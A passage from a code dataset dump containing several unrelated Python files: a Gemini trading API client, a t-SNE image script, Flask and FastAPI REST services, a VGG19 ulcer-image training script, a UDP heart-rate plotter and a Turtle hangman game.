field=models.DateField(verbose_name='\\u751f\\u7522\\u65e5\\u671f', db_column=b'MDATE'),\n ),\n ]\n","sub_path":"src/schedules/migrations/0003_auto_20160508_1033.py","file_name":"0003_auto_20160508_1033.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"320926244","text":"import os\nimport requests\nimport time\nimport configparser\nimport base64\nimport hmac\nimport hashlib\nimport json\nimport logging as log\n\nclass GeminiRequest(object):\n \"\"\"\n Client that will make requests to Gemini\n \"\"\"\n\n def __init__(self):\n config_file = os.path.join(os.path.dirname(__file__), 'settings.config')\n config = configparser.ConfigParser()\n config.read(config_file)\n self.url = config['API_SETTINGS']['url']\n self.api_key = config['API_SETTINGS']['api_key']\n self.api_secret = config['API_SETTINGS']['api_secret']\n\n\n def _nonce(self):\n return int(time.time()*1000)\n \n\n def _sign(self, data):\n j = json.dumps(data)\n j = base64.standard_b64encode(j.encode('utf8'))\n h = hmac.new(str.encode(self.api_secret), j, hashlib.sha384)\n signature = h.hexdigest()\n return {\n \"X-GEMINI-APIKEY\": self.api_key,\n \"X-GEMINI-SIGNATURE\": signature,\n \"X-GEMINI-PAYLOAD\": j\n }\n\n\n def getLastPrice(self, coin='ethusd'):\n path = '/v1/pubticker/%s'%(coin)\n response = requests.get(self.url + path)\n return float(response.json()['last'])\n\n\n def getPriceSpread(self, coin='ethusd'):\n path = '/v1/pubticker/%s'%(coin)\n response = requests.get(self.url + path)\n return (float(response.json()['bid']), float(response.json()['ask']))\n\n\n def getVolume(self, coin='ethusd'):\n path = '/v1/pubticker/%s'%(coin)\n response = requests.get(self.url + path)\n return float(response.json()['volume']['USD'])\n\n\n def checkBalances(self):\n path = '/v1/balances'\n data = {\n \"request\": \"/v1/balances\",\n \"nonce\": self._nonce()\n }\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n usd = [(x['available'], x['availableForWithdrawal'], x['amount']) for x in response if x['currency'] == 'USD'][0]\n eth = [(x['available'], x['availableForWithdrawal'], x['amount']) for x in response if x['currency'] == 'ETH'][0]\n btc = [(x['available'], x['availableForWithdrawal'], x['amount']) for x in response if x['currency'] == 'BTC'][0]\n ret = {\n 'USD': {'Available': usd[0], 'Withdrawable': usd[1], 'Total': usd[2]},\n 'ETH': {'Available': eth[0], 'Withdrawable': eth[1], 'Total': eth[2]},\n 'BTC': {'Available': btc[0], 'Withdrawable': btc[1], 'Total': btc[2]}\n }\n return ret\n\n\n def buy(self, amount, price, order_type = 'exchange limit', symbol = 'ethusd', exchange = 'gemini'):\n path = '/v1/order/new'\n data = {\n \"request\": \"/v1/order/new\",\n \"nonce\": self._nonce(),\n \"symbol\": symbol,\n \"amount\": round(amount, 4),\n \"price\": round(price, 2),\n \"exchange\": exchange,\n \"side\": \"buy\",\n \"type\": order_type\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n try:\n response['order_id']\n except:\n return response['message']\n\n return response\n\n\n def sell(self, amount, price, order_type = 'exchange limit', symbol = 'ethusd', exchange = 'gemini'):\n path = '/v1/order/new'\n data = {\n 'request': '/v1/order/new',\n 'nonce': self._nonce(),\n 'symbol': symbol,\n 'amount': round(amount, 4),\n 'price': round(price, 2),\n 'exchange': exchange,\n 'side': 'sell',\n 'type': order_type\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n try:\n response['order_id']\n except:\n return response['message']\n\n return response\n\n\n def order_status(self, order_id):\n path = '/v1/order/status'\n data = {\n \"request\": \"/v1/order/status\",\n \"nonce\": self._nonce(),\n \"order_id\": order_id\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n return response\n\n\n def active_orders(self):\n path = '/v1/orders'\n data = {\n \"request\": \"/v1/orders\",\n \"nonce\": self._nonce()\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n return response\n\n\n def cancel_order(self, order_id):\n path = '/v1/order/cancel'\n data = {\n \"request\": \"/v1/order/cancel\",\n \"nonce\": self._nonce(),\n \"order_id\": order_id\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n return response\n\n\n def cancel_all_orders(self):\n path = '/v1/order/cancel/session'\n data = {\n \"request\": \"/v1/order/cancel/session\",\n \"nonce\": self._nonce()\n }\n\n headers = self._sign(data)\n response = requests.post(self.url + path, headers = headers).json()\n\n return response","sub_path":"Old/api/GeminiRequest.py","file_name":"GeminiRequest.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342447051","text":"from PIL import Image\nfrom sklearn.manifold import TSNE\nimport numpy as np\nimport glob, json, os\n\n# create datastores\nvector_files = []\nimage_vectors = []\nchart_data = {}\nimage_to_size = {}\nimage_to_idx = {}\nmaximum_imgs = None\ndata_dir = '../data/'\nselected_imgs = json.load(open(data_dir + 'json/selected_image_positions.json')).keys()\n\n##\n# build a list of image vectors to process\n##\n\nvector_files = glob.glob(data_dir + 'results/*.npy')\n\n# allow user to only build projections on a subset of the data\nif selected_imgs:\n vf = []\n for i in vector_files:\n img = os.path.basename(i).replace('.npy','')\n if img in selected_imgs:\n vf.append(i)\n vector_files = vf\n\n# allow user to only build projections on n images\nif maximum_imgs:\n vector_files = vector_files[:maximum_imgs]\n\n# get the image sizes\nimage_files = glob.glob(data_dir + 'selected_images/*.jpg')\nfor c, i in enumerate(image_files):\n image_name = os.path.basename(i)\n image_to_size[image_name] = Image.open(i).size\n image_to_idx[image_name] = c\n\n# load the vectors\nfor c, i in enumerate(vector_files):\n image_vectors.append(np.load(i))\n print(' * loaded', c, 'of', len(vector_files), 'image vectors')\n\n# build the tsne model on the image vectors\nprint('building tsne model')\nmodel = TSNE(n_components=2, random_state=0)\nnp.set_printoptions(suppress=True)\nfit_model = model.fit_transform( np.array(image_vectors) )\n \n# store the coordinates of each image in the chart data\nfor c, i in enumerate(fit_model):\n image_name = os.path.basename(vector_files[c]).replace('.npy', '') \n chart_data[image_name] = {\n 'x': i[0],\n 'y': i[1],\n 'idx': image_to_idx[image_name]\n #'z': i[2]\n #'size': image_to_size[image_name]\n }\n\nwith open(data_dir + 'json/selected_image_tsne_projections.json', 'w') as out:\n json.dump(chart_data, out)","sub_path":"utils/cluster_vectors.py","file_name":"cluster_vectors.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"265102725","text":"from flask import Flask\nfrom flask_restful import Resource, Api, reqparse\nfrom bson.objectid import ObjectId\nimport os\nfrom flask_pymongo import PyMongo\n\napp = Flask(__name__)\napp.config['MONGO_URI'] = os.environ.get('MONGO_URL')\nmongo = PyMongo(app, config_prefix='MONGO')\nprint(mongo)\n\napi = Api(app)\n\nclass MessageController(Resource):\n\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('message', type=str, required=True, location='json')\n args = parser.parse_args(strict=True)\n print(mongo)\n result = mongo.db.messagestore.insert({\"message\" : args.message})\n print(result)\n return {\"digest\" : str(result)}\n\nclass MessagesController(Resource):\n\n def get(self, message_id):\n print(mongo)\n result = mongo.db.messagestore.find_one({'_id': ObjectId(message_id)}, {'_id': False})\n return result\n\napi.add_resource(MessageController, '/messages')\napi.add_resource(MessagesController, '/messages/')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407013624","text":"import uvicorn\r\n\r\nfrom datetime import timedelta\r\nfrom fastapi.encoders import jsonable_encoder\r\nfrom fastapi import APIRouter, FastAPI, Depends, HTTPException, status\r\nfrom fastapi.responses import Response\r\nfrom fastapi.security import OAuth2PasswordRequestForm\r\n\r\nfrom models import UserIn, UserOut, Token, UserPatch, create_user, get_users, update_user_data, \\\r\n delete_user_data, get_user_data, authenticate_user, create_access_token, get_current_user\r\n\r\nACCESS_TOKEN_EXPIRE_MINUTES = 30\r\n\r\napp = FastAPI()\r\nrouter = APIRouter()\r\n\r\n\r\ndef response_model(data, message):\r\n return {\r\n \"data\": [data],\r\n \"code\": 200,\r\n \"message\": message,\r\n }\r\n\r\n\r\ndef error_response_model(error, code, message):\r\n return {\"error\": error, \"code\": code, \"message\": message}\r\n\r\n\r\n@app.post(\"/token\", response_model=Token)\r\nasync def login_for_access_token(form_data: OAuth2PasswordRequestForm = Depends()):\r\n user = authenticate_user(form_data.username, form_data.password)\r\n if not user:\r\n raise HTTPException(\r\n status_code=status.HTTP_401_UNAUTHORIZED,\r\n detail=\"Incorrect username or password\",\r\n headers={\"WWW-Authenticate\": \"Bearer\"},\r\n )\r\n access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)\r\n access_token = create_access_token(\r\n data={\"sub\": user.username}, expires_delta=access_token_expires\r\n )\r\n return {\"access_token\": access_token, \"token_type\": \"bearer\"}\r\n\r\n\r\n@app.get(\"/users/\")\r\ndef users_list():\r\n users = get_users()\r\n return users\r\n\r\n\r\n@app.get(\"/users/me/\", response_model=UserOut)\r\nasync def read_users_me(current_user: UserOut = Depends(get_current_user)):\r\n return current_user\r\n\r\n\r\n@app.post(\"/create\")\r\ndef create_user_data(user: UserIn):\r\n user = jsonable_encoder(user)\r\n new_user = create_user(user)\r\n return new_user\r\n\r\n\r\n@app.get(\"/users/{_id}\", response_description='User data retrieved')\r\ndef user_read(_id: str):\r\n user = get_user_data(_id)\r\n return user\r\n\r\n\r\n@app.put(\"/users/{_id}\", response_description='User data updated')\r\ndef user_update(_id: str, user: UserIn):\r\n user = {k: v for k, v in user.dict().items() if v is not None} # -> \r\n updated_user = update_user_data(_id, user)\r\n if updated_user:\r\n return response_model(\"User with ID: {} updated successfully\".format(_id),\r\n \"User updated successfully\",\r\n )\r\n return error_response_model(\r\n \"An error occurred\",\r\n 404,\r\n \"There was an error updating the user data.\",\r\n )\r\n\r\n\r\n@app.patch(\"/users/{_id}\", response_description='User data partially updated')\r\ndef user_partial_update(_id: str, user: UserPatch):\r\n user = {k: v for k, v in user.dict().items() if v is not None} # -> \r\n updated_user = update_user_data(_id, user)\r\n if updated_user:\r\n return response_model(\"User with ID: {} updated successfully\".format(_id),\r\n \"User updated successfully\",\r\n )\r\n return error_response_model(\r\n \"An error occurred\",\r\n 404,\r\n \"There was an error updating the user data.\",\r\n )\r\n\r\n\r\n@app.delete(\"/users/{_id}\", response_description='User data deleted')\r\ndef user_delete(_id: str):\r\n deleted_user = delete_user_data(_id)\r\n if deleted_user:\r\n return response_model(\"User with ID: {} deleted successfully\".format(_id),\r\n \"User deleted successfully\",\r\n )\r\n return error_response_model(\r\n \"An error occurred\",\r\n 404,\r\n \"User doesn't exist\",\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000, reload=True)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"603063971","text":"import argparse\nimport logging\nimport os\nimport sys\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\n\nfrom tqdm import tqdm\nimport numpy as np\n\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\n\nfrom model.vgg import VGG19\n\nfrom utils.split import no_people_split, ul_people_split, no_instance_split, ul_instance_split\nfrom utils.store_result import save_train_info, save_intermediate_train, save_intermediate_val\nfrom utils.folder import ImageFolder\n\nfrom matplotlib import pyplot as plt\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nn_classes = 2\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Train the VGG19 on images',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-e', '--epochs', metavar='E', type=int, default=25,\n help='Number of epochs', dest='epochs')\n parser.add_argument('-b', '--batch-size', metavar='B', type=int, nargs='?', default=20,\n help='Batch size', dest='batchsize')\n parser.add_argument('-l', '--learning-rate', metavar='LR', type=float, nargs='?', default=0.0000001,\n help='Learning rate', dest='learning_rate')\n parser.add_argument('-s', '--seperate', dest='seperate', type=str, default='instance',\n help='you can choose people, instance, fixed_data')\n parser.add_argument('-t', '--train_type', dest='train', type=str, default='TwoEncoder',\n help='you can choose TwoEncoder, Mynpy')\n parser.add_argument('-n', '--experience-num', dest='num_exp', type=int, default=1,\n help='order number of experiences')\n return parser.parse_args()\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\ndef main(net,\n args,\n device,\n dir_checkpoint='./checkpoints'):\n\n num_exp = args.num_exp\n\n # data & init param\n seperate_by = args.seperate\n train_type = args.train\n\n # train param\n epochs = args.epochs\n batch_size = args.batchsize\n learning_rate = args.learning_rate\n\n # data set path\n if seperate_by == 'people' or seperate_by == 'instance':\n split_data(num_exp, seperate_by)\n\n # data set path\n data_path = '../data/ulcer_detect'\n\n # image pre-processing\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n\n transform = transforms.Compose([\n transforms.Resize([224, 224]),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n\n #load image set\n trainSet = ImageFolder(root=data_path, transform=transform, \\\n train='train', split_txt=f'./result/{num_exp}/data/')\n\n valSet = ImageFolder(root=data_path, transform=transform, \\\n train='val', split_txt=f'./result/{num_exp}/data/')\n\n n_train = len(trainSet)\n n_val = len(valSet)\n\n train_loader = DataLoader(\n dataset=trainSet,\n batch_size=batch_size,\n shuffle=True,\n num_workers=0,\n pin_memory=True\n )\n val_loader = DataLoader(\n dataset=valSet,\n batch_size=1,\n shuffle=False,\n num_workers=0,\n pin_memory=True\n )\n\n # logging\n logging.info(f'''Starting training:\n Experience number: {num_exp}\n Seperate type: {seperate_by}\n Train type: {train_type}\n Epoch: {epochs}\n Batch size: {batch_size}\n Learning rate: {learning_rate}\n Training size: {n_train}\n Validation size: {n_val}\n Device: {device.type}\n ''')\n\n save_train_info(num_exp, seperate_by, train_type, epochs, batch_size, learning_rate,\\\n n_train, n_val, device.type)\n\n # init optim & loss func\n optimizer = torch.optim.Adam(net.parameters(),lr = learning_rate)\n #optimizer = optim.SGD(net.parameters(), lr=lr, momentum=0.9)\n #lr_scheduler = optim.lr_scheduler.MultiStepLR(optimizer=optimizer, milestones=[int(epochs * 0.5), int(epochs * 0.75)], gamma=0.1, last_epoch=-1)\n criterion = nn.BCELoss().to(device)\n #criterion = nn.CrossEntropyLoss().to(device)\n\n best_val_epoch = 0\n best_val_loss = 999999999.0\n\n loss_flow = []\n\n for epoch in range(epochs):\n # train part\n train_loss = train_net(net,device,train_loader,optimizer,criterion,n_train,epoch,epochs,num_exp)\n # validation part\n val_loss = val_net(net,device,val_loader,criterion,n_val,epoch,num_exp)\n # check best validation set loss on each epoch\n loss_flow.append(train_loss)\n if best_val_loss > val_loss:\n best_val_loss = val_loss\n best_epoch = epoch + 1\n try:\n os.mkdir(dir_checkpoint)\n logging.info('Created checkpoint directory')\n except OSError:\n pass\n torch.save(net.state_dict(),\n dir_checkpoint + f'CP_epoch{epoch + 1}.pth')\n logging.info(f'Checkpoint {epoch + 1} saved !')\n\n plt.plot(range(0, epochs), loss_flow, color='blue',\n lw=2, label='loss for each epoch')\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.title('loss for each epoch')\n plt.savefig(\n os.path.join(f\"./result/{num_exp}/Train_Loss.png\"), bbox_inches='tight')\n plt.close()\n # save best validation set loss model\n net.load_state_dict(\n torch.load(f'./checkpoints/{num_exp}/CP_epoch{best_epoch}.pth', map_location=device)\n )\n torch.save(net.state_dict(), f'./result/{num_exp}/state_dict/model.pth')\n \n\ndef train_net(net,device,train_loader,optimizer,criterion,n_train,epoch,epochs,num_exp):\n net.train()\n epoch_loss = 0.0\n correct = 0\n total = 0\n count = 0\n with tqdm(total=n_train, desc=f'Epoch {epoch + 1}/{epochs}', unit='img') as pbar:\n for i, (imgs,target,_) in enumerate(train_loader):\n imgs = imgs.to(device=device)\n target = target.float()\n target = target.to(device=device)\n\n output = net(imgs)\n loss = criterion(output, target)\n\n _, predicted = torch.max(output.data, 1)\n _, target = torch.max(target.data, 1)\n\n total += target.size(0)\n correct += (predicted == target).sum().item()\n\n epoch_loss += loss.item()\n\n pbar.set_postfix(**{'loss (train)': loss.item()})\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n count += 1\n\n pbar.update(imgs.shape[0])\n accuracy = 100 * correct/total\n print(f'Accuracy train on the images : {accuracy}')\n epoch_loss = epoch_loss / count\n print(f'Train loss in epoch {epoch+1}, loss : {epoch_loss}')\n save_intermediate_train(epoch+1, num_exp, accuracy, epoch_loss)\n return epoch_loss\n\ndef val_net(net,device,val_loader,criterion,n_val,epoch, num_exp):\n net.eval()\n epoch_loss = 0.0\n correct = 0\n total = 0\n\n TP = 0\n FP = 0\n FN = 0\n TN = 0\n\n with tqdm(total=n_val, desc='Validation round', unit='img', leave=False) as pbar:\n for i, (imgs, target,_) in enumerate(val_loader):\n imgs = imgs.to(device=device)\n target = target.float()\n target = target.to(device=device)\n\n output = net(imgs)\n loss = criterion(output, target)\n _, predicted = torch.max(output.data, 1)\n _, target = torch.max(target.data, 1)\n #predicted = (output.data > 0.5).float()\n total += target.size(0)\n correct += (predicted == target).sum().item()\n\n epoch_loss += loss.item()\n\n for item in predicted==target:\n temp_target = target.cpu().numpy()\n if item.item() == 0:\n if temp_target == 0:\n path = 'FP'\n FP = FP + 1\n if temp_target == 1:\n path = 'FN'\n FN = FN + 1\n elif item.item() == 1:\n if temp_target == 1:\n path = 'TP'\n TP = TP + 1\n if temp_target == 0:\n path = 'TN'\n TN = TN + 1\n\n pbar.set_postfix(**{'loss (val)': loss.item()})\n pbar.update(imgs.shape[0])\n\n if (TP + FP) == 0:\n precision = 0.0\n else:\n precision = TP / (TP + FP)\n recall = TP / (TP + FN)\n specificity = TN / (FP + TN)\n\n accuracy = 100 * correct/total\n epoch_loss = epoch_loss / n_val\n print(f'Accuracy validation on the images : {accuracy}')\n print(f'Validation loss in epoch {epoch+1}, loss : {epoch_loss}')\n print(f'TP : {TP}, TN : {TN}, FP : {FP}, FN : {FN}')\n print(f'Precision : {precision}, Recall : {recall}, Specificity : {specificity}')\n save_intermediate_val(epoch+1, num_exp, accuracy, epoch_loss, precision, recall, specificity,\\\n TP, TN, FP, FN)\n return epoch_loss\n\ndef split_data(num, seperate_by):\n try:\n os.mkdir(f\"./result/{num}\")\n os.mkdir(f\"./result/{num}/state_dict\")\n os.mkdir(f\"./result/{num}/data\")\n except OSError:\n pass\n if seperate_by == 'people':\n print('Seperated by people randomly..')\n no_people_split(src='../data/ulcer_detect/normal/',no=4500, num=num)\n ul_people_split(src='../data/ulcer_detect/ulcer/',ul=1000, num=num)\n elif seperate_by == 'instance':\n print('Seperated by instance randomly..')\n no_instance_split(src='../data/ulcer_detect/normal/',no=4500, num=num)\n ul_instance_split(src='../data/ulcer_detect/ulcer/',ul=1000, num=num)\n print('Finish')\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n args = get_args()\n\n my_npy_path = ''\n\n train_type = args.train\n\n assert train_type == 'TwoEncoder' or train_type == 'Mynpy', 'you must set TwoEncoder or Mynpy'\n\n net = VGG19(n_classes)\n print('parameters of model : ', count_parameters(net))\n net.to(device=device)\n\n dir_checkpoint = f'checkpoints/{args.num_exp}/'\n\n try:\n os.mkdir(dir_checkpoint)\n logging.info('Created checkpoint directory')\n except OSError:\n pass\n\n if train_type == 'Mynpy':\n net.load_state_dict(\n torch.load(my_npy_path, map_location=device)\n )\n logging.info(f'Model loaded from {my_npy_path}')\n\n try:\n main(net=net,\n args=args,\n device=device,\n dir_checkpoint=dir_checkpoint\n )\n except KeyboardInterrupt:\n torch.save(net.state_dict(), 'INTERRUPTED.pth')\n logging.info('Saved interrupt')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n del net","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631436448","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport serial\nimport json\nimport time\nimport random\n# Need socket to create a udp link\nimport socket\nBUFSIZE = 1024\n\n# 图像范围\ny_width = 100\nY_MID = 0\nx_width = 1000\n\n\"\"\"\ndata_list_len = 25\navg_level = 15\n\"\"\"\n\n# 滤波等级\ndata_list_len = 15\navg_level = 0\n\ntotal_avg_level = 60\nheart_circle = 6000\n\n# 串口设置\nportx = \"COM24\"\nbps = 115200\ntimex = 5\n#ser = serial.Serial(portx, bps, timeout=timex)\n\n# udp设置\n# Set server port\nip_port = ('192.168.1.125', 80)\n# Set udp\nserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n# Set bind mod\nserver.bind(ip_port)\n\n\ndef udp_get_list(list_length, level):\n\n i = 0\n data_list = []\n while i < list_length:\n data, client_addr = server.recvfrom(BUFSIZE)\n data_str = data.decode('utf-8').encode('utf-8')\n print(data_str)\n server.sendto(data.upper(),client_addr)\n\n try:\n max30100_data = json.loads(data_str)\n IR_list = max30100_data[\"IR\"]\n print(IR_list)\n \n for IR in IR_list :\n data_list.append(IR)\n i = i + 1\n\n except:\n print(data_str)\n if level > 0:\n avg_list = avg_filter(data_list, level)\n return avg_list\n else:\n return data_list\n\n\n# 串口读取(不包含滤波)\ndef serial_get_list(list_length, level):\n i = 0\n data_list = []\n while i < list_length:\n serial_str = ser.readline().decode(\"utf-8\")\n\n try:\n max30100_data = json.loads(serial_str)\n IR = max30100_data[\"IR\"]\n # print(IR)\n data_list.append(IR)\n i = i + 1\n\n except:\n print(serial_str)\n if level > 0:\n avg_list = avg_filter(data_list, level)\n return avg_list\n else:\n return data_list\n\n# 均值滤波\n\n\ndef avg_filter(src_list, level):\n avg_list = []\n for i in range(len(src_list) - level + 1):\n temp = 0\n for j in range(level):\n temp += src_list[i + j]\n\n avg_list.append(temp / level)\n\n return avg_list\n\n# 波谷统计\n\n\ndef lowest_point(src_list):\n lowest_list = []\n last_low = 0\n\n temp_mid = (max(src_list) + min(src_list)) // 2\n\n for i in range(len(src_list) - 2):\n temp = src_list[i+1]\n if temp < 3000:\n break\n temp_previous = src_list[i]\n temp_next = src_list[i + 2]\n\n if temp < temp_previous and temp <= temp_next and temp < temp_mid:\n if i - last_low > 30:\n lowest_list.append(i)\n last_low = i\n return lowest_list\n\n\n# 主函数\ndef main():\n\n list_y = []\n for _ in range(x_width):\n # list_y.append(random.random())\n list_y.append(0)\n # print(list_y)\n\n temp_y = np.array(list_y)\n heart_rate = 0\n\n #now_time = time.perf_counter()\n while True:\n\n #temp_list = serial_get_list(data_list_len, avg_level)\n temp_list = udp_get_list(data_list_len, avg_level)\n\n for temp in temp_list:\n list_y.pop(0)\n list_y.append(temp)\n\n avg_list_y = avg_filter(list_y, total_avg_level)\n lowest_point_list = lowest_point(avg_list_y)\n if len(lowest_point_list) > 1:\n heart_rate = heart_circle // (\n lowest_point_list[1] - lowest_point_list[0])\n\n temp_y = np.array(avg_list_y)\n #temp_y = np.array(list_y)\n\n plt.clf()\n plt.title(\"Heart Rate:\" + str(heart_rate))\n plt.ylabel(\"IR data\")\n\n temp_x = np.arange(len(avg_list_y))\n plt.plot(temp_x, temp_y)\n\n #plt.ylim(Y_MID - y_width,Y_MID + y_width)\n\n for temp in lowest_point_list:\n plt.plot(temp, avg_list_y[temp], \"ro\")\n\n plt.draw()\n plt.pause(0.001)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"213544017","text":"import turtle\nturtle.setup(1200, 600)\nprozor = turtle.Screen()\nprozor.title(\"Hangman.\")\nturtle.bgpic(\"slika.gif\")\nstrelica = turtle.getturtle()\nstrelica.penup()\nturtle.hideturtle()\nturtle.setposition(-50, 300)\nturtle.write(\"Hangman\", align=\"left\", font=(\"Arial\", 30))\nturtle.setposition(100, 200)\nturtle.write(\"Dobrodošli!\", align=\"left\", font=(\"Arial\", 15))\nturtle.setposition(100, 180)\nturtle.write(\"Ovo je igrica Hangman.Odaberi slovo i pogodi riječ.\", font=(\"Arial\", 15))\nturtle.setposition(100, 160)\nturtle.write(\"Sretno! :)\", font=(\"Arial\", 15))\n\n\nimport random\n\nrijec_iz_liste = \"false\"\n\nRijeci = [\"telefon\", \"majmun\", \"tigar\", \"medvjed\", \"vjeverica\", \"gepard\",\n \"laptop\", \"torba\", \"slika\", \"farmaceut\", \"cvijet\", \"zeko\", \"kalendar\",\n \"radijator\", \"zgrada\", \"priroda\", \"odmor\", \"planina\", \"dukserica\", \"garderoba\",\n \"klavir\", \"orkestar\", \"doktor\", \"fakultet\", \"automobil\", \"helikopter\", \"diploma\"]\n\nduzinaRijeci = len(Rijeci)\npozicija_rijeci = random.randint(0, duzinaRijeci)\nrijec_za_pogadjanje = (Rijeci[pozicija_rijeci])\nD = len(rijec_za_pogadjanje)\n\nA = \"\" # A je crtica\nfor i in rijec_za_pogadjanje:\n A = A + \"_ \"\nturtle.setposition(100, 0)\nturtle.write(A, font=70)\n\n\n# Funkcija za unos slova\ndef unos_slova():\n#Kreiramo varijablu za unos slova\n slovo = \"\"\n slovo = turtle.textinput(\"Hangman\", \"Unesite slovo ili riječ\")\n return slovo\n\n\n# Funkcija za provjeru unesenog slova\ndef provjera_slova(A):\n global greska\n global netacno\n turtle.clear()\n if len(slovo) > 1:\n if slovo == rijec_za_pogadjanje:\n return slovo\n else:\n greska += 1\n netacno.append(slovo)\n return A\n else:\n if slovo in rijec_za_pogadjanje:\n turtle.setposition(100, -60)\n turtle.write(\"Izabrana riječ sadrži: \", font=15)\n turtle.setposition(250, -60)\n turtle.write(slovo, font=15)\n A_temp = \"\"\n count = 0\n for i in rijec_za_pogadjanje:\n if i == slovo:\n A_temp = A_temp + i + \" \"\n else:\n A_temp += A[count * 2] + \" \"\n count = count + 1\n return A_temp\n else:\n turtle.setposition(100, -80)\n turtle.write(\"Izabrana riječ ne sadrži: \", font=15)\n turtle.setposition(280, -80)\n turtle.write(slovo, font=15)\n greska += 1\n netacno.append(slovo)\n return A\n\n\ngreska = 0\nnetacno = []\nkraj = \"false\"\nwhile kraj == \"false\":\n slovo = unos_slova()\n A = provjera_slova(A)\n turtle.setposition(100, 0)\n turtle.write(A, font=15)\n turtle.setposition(100, -120)\n turtle.write(\"Preostali pokušaji: \", font=15)\n turtle.setposition(100, -140)\n turtle.write(9 - greska, font=15)\n turtle.setposition(100, -160)\n turtle.write(\"Pogrešni pokušaji: \", font=15)\n turtle.setposition(100, -180)\n turtle.write(netacno, font=15)\n if not \"_\" in A:\n rijec_iz_liste == \"true\"\n turtle.setposition(-50, 0)\n turtle.write(\"Bravo!\", font=(\"Arial\", 70))\n ponovo = turtle.textinput(\"Hangman\", \"Da li želite igrati ponovo? (DA ili NE)\")\n if ponovo == \"NE\":\n kraj = \"true\"\n else:\n duzinaRijeci = len(Rijeci)\n pozicija_rijeci = random.randint(0, duzinaRijeci)\n rijec_za_pogadjanje = (Rijeci[pozicija_rijeci])\n D = len(rijec_za_pogadjanje)\n A = \"\" # A je crtica\n for i in rijec_za_pogadjanje:\n A = A + \"_ \"\n turtle.setposition(100, 0)\n turtle.write(A, font=70)\n if greska == 1:\n turtle.bgpic(\"slika2.gif\")\n if greska == 2:\n turtle.bgpic(\"slika3.gif\")\n if greska == 3:\n turtle.bgpic(\"slika4.gif\")\n if greska == 4:\n turtle.bgpic(\"slika5.gif\")\n if greska == 5:\n turtle.bgpic(\"slika6.gif\")\n if greska == 6:\n turtle.bgpic(\"slika7.gif\")\n if greska == 7:\n turtle.bgpic(\"slika8.gif\")\n if greska == 8:\n turtle.bgpic(\"slika9.gif\")\n if greska == 9:\n turtle.bgpic(\"slika10.gif\")\n turtle.penup()\n turtle.setposition(-50, 100)\n turtle.pendown()\n turtle.write(\"Izgubili ste!\", font=(\"Arial\", 70))\n\n\nturtle.exitonclick()","sub_path":"hangman2.py","file_name":"hangman2.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"274799052","text":"import pandas as pd\r\nimport csv\r\nimport re\r\nimport time\r\nimport glob\r\nimport logging\r\nimport sys,linecache\r\nimport os\r\nfrom functools import reduce\r\nimport psycopg2\r\nimport datetime as dt\r\nfrom dateutil.tz import gettz\r\nimport random\r\nfrom pympler import tracker\r\nfrom excel_util import ExcelUtil\r\nfrom config import ROOT_DIR,TEST_ROOT_DIR,JUST_TEST,CIK_FILE_PATH,EXCHANGES\r\nfrom config import JUST_TEST_ARRAY,TICK_CATEGORIES,LOG_FILE_PATH,LOGGER_NAME\r\nfrom config import METRIC_DATA_PATH\r\ntry:\r\n # Python2\r\n from cStringIO import StringIO \r\nexcept ImportError:\r\n # Python3\r\n from io import StringIO\r\n\r\ndef PrintException():\r\n cur_logger = logging.getLogger(LOGGER_NAME) \r\n exc_type, exc_obj, tb = sys.exc_info()\r\n f = tb.tb_frame\r\n lineno = tb.tb_lineno\r\n filename = f.f_code.co_filename\r\n linecache.checkcache(filename)\r\n line = linecache.getline(filename, lineno, 